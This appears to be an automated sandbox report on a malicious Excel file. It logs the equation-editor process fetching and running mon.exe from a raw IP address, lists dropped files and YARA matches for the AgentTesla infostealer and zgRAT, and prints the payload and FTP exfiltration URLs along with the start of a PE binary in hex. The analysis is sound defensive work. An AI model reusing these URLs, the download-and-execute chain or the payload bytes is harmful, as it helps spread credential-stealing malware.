Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179

Source: global traffic

TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:26:50 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.19Last-Modified: Mon, 08 Aug 2022 13:26:41 GMTETag: "dae00-5e5bac4276722"Accept-Ranges: bytesContent-Length: 896512Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d 0f f1 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a6 0d 00 00 06 00 00 00 00 00 00 2e c5 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 c4 0d 00 53 00 00 00 00 e0 0d 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a5 0d 00 00 20 00 00 00 a6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 e0 0d 00 00 04 00 00 00 a8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 ac 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c5 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 d2 0c 00 d0 f2 00 00 03 00 00 00 b7 00 00 06 28 b0 00 00 e0 21 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 07 00 d8 00 00 00 01 00 00 11 02 19 8d 4b 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 4b 00 00 70 a2 25 18 72 59 00 00 70 a2 7d 02 00 00 04 02 14 7d 03 00 00 04 02 28 16 00 00 0a 20 03 6d 2f 17 20 e3 d6 7e 66 61 25 0a 1c 5e 45 06 00 00 00 19 00 00 00 35 00 00 00 02 00 00 00 64 00 00 00 d4 ff ff ff 45 00 00 00 2b 62 00 00 02 28 13 00 00 06 06 20 7e a4 05 de 5a 20 b0 66 13 3d 61 2b c0 02 7b 0f 00 00 04 1b 28 19 00 00 06 00 06 20 90 2c 64 b5 5a 20 cc df a4 7b 61 2b a4 00 06 20 99 ca 63 a7 5a 20 26 cf 38 56 61 2b 94 00 02 7b 19 00 00 04 1b 28 19 00 00 06 06 20 aa 93 e2 7a 5a 20 10 37 37 e8 61 38 75 ff ff ff 7e 04 00 00 04 74 03 00 00 01 02 7b 02 00 00 04 28 1a 00 00 06 26 2a 13 30 03 00 3a 00 00 00 01 00 00 11 00 20 92 ef 9c 68 20 91 b6 de 3e 61 25 0a 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 17 00 00 00 2b 15 02 28 08 00 0

Source: global traffic

HTTP traffic detected: GET /mon/mon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.152Connection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_033F0517

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.89.152

Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ftp://ftp.alonsorojasmudanzasnacionales.com/okok
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.980231565.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.152/mon/mon.exe
Source: EQNEDT32.EXE, 00000002.00000002.980379533.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.152/mon/mon.exehhC:
Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77qlBFDgeMeBhXCCMul.org
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ZSkVPd.com
Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FBCD146.wmf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_033F0517

Source: global traffic

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\Regasm_svchost.exe			Jump to dropped file

.NET source code contains very large array initializations

Source: 6.0.Regasm_svchost.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6FDDE178u002d8CC0u002d48F2u002d916Fu002d3E2DAE062187u007d/u0034CAF38F2u002d454Fu002d4211u002dA62Cu002d7FB6FD0C5EE8.cs

Large array initialization: .cctor: array initializer size 11646

Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_001D7060	5_2_001D7060
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_001DEDF0	5_2_001DEDF0
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_00A40048	5_2_00A40048
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_00A40024	5_2_00A40024
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_00A46B98	5_2_00A46B98
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_00A411E8	5_2_00A411E8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 5_2_00A411D9	5_2_00A411D9
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003D42A0	6_2_003D42A0
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003D4EB8	6_2_003D4EB8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003DDED8	6_2_003DDED8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003DCA48	6_2_003DCA48
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_003D45E8	6_2_003D45E8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_0062E839	6_2_0062E839
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_0062ACE8	6_2_0062ACE8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_0062D4F8	6_2_0062D4F8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_00624950	6_2_00624950
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_0062C788	6_2_0062C788
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_00627B98	6_2_00627B98
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_0062F0E8	6_2_0062F0E8
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_00625102	6_2_00625102
Source: C:\Users\Public\Regasm_svchost.exe	Code function: 6_2_00660468	6_2_00660468

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
